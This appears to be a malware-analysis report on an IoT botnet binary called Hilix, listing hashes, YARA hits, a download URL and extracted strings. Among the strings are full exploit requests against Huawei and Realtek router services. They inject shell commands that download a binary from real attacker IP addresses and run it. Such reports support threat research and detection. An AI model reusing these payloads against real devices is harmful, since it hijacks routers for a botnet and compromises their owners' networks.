Sample details: fa1176573fa24138182c7d9402ed460c

Hashes
MD5: fa1176573fa24138182c7d9402ed460c
SHA1: 022373dfbceaa212788f9e457fd131f8eeb297cd
SHA256: 1a8d260ab4be3d1ecc5fab47e47f75777438d174e5b4dbab33a1cba73c2dc356
SSDEEP: 768:pevCUl+4lGCSWaKeCCYeFF/WotuZeeeRESWf3fTuUN09Toi8sTsEl:pGCa+CSD6CF/WocZRoYfTuS09X8isEl
Details
File Type: ELF
Yara Hits
YRP/domain | YRP/IP | YRP/url | YRP/contentis_base64 | YRP/Big_Numbers1
Source
http://23.82.185.164/bins/Hilix.m68k
Strings
		N^NuNV
LN^NuNV
N^NuNV
N^NuNV
 OHWHQHy
&/|JR**
N^NuNV
N^NuNV
o2$	"D(
D THx@
N^Nu"/
NuNq o
b(p7 B
p7N@-@
N^NuNV
N^NuNV
N^NuNuNV
N^NuNV
N^NuNV
N^NuNV
p@N@-@
N^NuNV
"	p6N@-@
N^NuNuNV
p%N@-@
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNuNV
N^NuNV
pUN@-@
N^NuNV
N^NuNV
pBN@-@
N^NuNV
N^NuNV
N^NuNuNV
N^NuNuNV
N^NuNV
N^NuNuNV
 @N^NuNuNV
 @N^NuNV
X @N^NuNV
N^NuNV
N^NuNV
N^NuNV
 @N^NuNV
 @N^NuNuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNuNV
N^NuNuNV
N^NuNuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNuNV
N^NuNV
N^NuNuNV
N^NuNuNV
N^NuNV
 @N^NuNuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
 @N^NuNuNV
 @N^NuNuNV
N^NuNV
N^NuNV
N^NuNuNV
 @N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNuNV
N^NuNV
N^NuNV
 @N^NuNV
N^NuNV
N^NuNuNV
N^NuNV
 @N^NuNV
 @N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNuNV
N^NuNuNV
HN^NuNuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
NqNuNV
"	pfN@-@
N^NuNuNV
N^NuNV
"	plN@-@
N^NuNV
N^NuNV
N^NuNuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNuNV
N^NuNuNV
 @N^NuNuNV
p+N@-@
N^NuNuNV
LN^NuNV
DN^NuNV
N^NuNV
N^NuNV
 @N^NuNuNV
N^NuNuNV
N^NuNV
NqNuNV
N^NuNV
p-N@-@
N^NuNV
N^NuNuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
%$N^NuPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.82.185.164 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
23.82.185.164
Hilix @Usip
POST /picdesc.xml HTTP/1.1
Host: 127.0.0.1:52869
Content-Length: 630
Accept-Encoding: gzip, deflate
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Connection: keep-alive
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf nig; wget http://159.203.44.33/bins/Hilix.mips -O nig; chmod 777 nig; ./nig realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
POST /wanipcn.xml HTTP/1.1
Host: 127.0.0.1:52869
Content-Length: 630
Accept-Encoding: gzip, deflate
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Connection: keep-alive
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf nig; wget http://23.82.185.164/bins/Hilix.mips -O nig; chmod 777 nig; ./nig realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
,7gaee
,7gael
,7gaea
fdeadbdf
"' 5&759fdea
. 1m,ea
"1& 1,fa1? ?'efg
0125!8 
5: '8%
5%!5&=;
'!$$;& 
$5''#;&0
509=:efg`
& agad
<;`!?!b5 
?;: fdd`
<!: acam
509=:efg
g1$a#f!
'<188T
1:5681T
'-' 19T
{6=:{6!'-6;,t
nt5$$81 t:; t2;!:0T
:7;&&17 T
{6=:{6!'-6;,t$'T
{6=:{6!'-6;,t?=88tymtT
{$&;7{T
{95$'T
{$&;7{:1 { 7$T
{' 5 !'T
z5:=91T
{$&;7{:1 {&;! 1T
5''#;&0T
{1 7{&1';8"z7;:2T
:591'1&"1&tT
{01"{#5 7<0;3T
{01"{9='7{#5 7<0;3T
$662*7!E
1: 1&T
e365`70;9ag:<$ef1=d?2>T
;::17 10t
;!&71t
:3=:1t
?/dev/null
.shstrtab
.rodata
.ctors
.dtors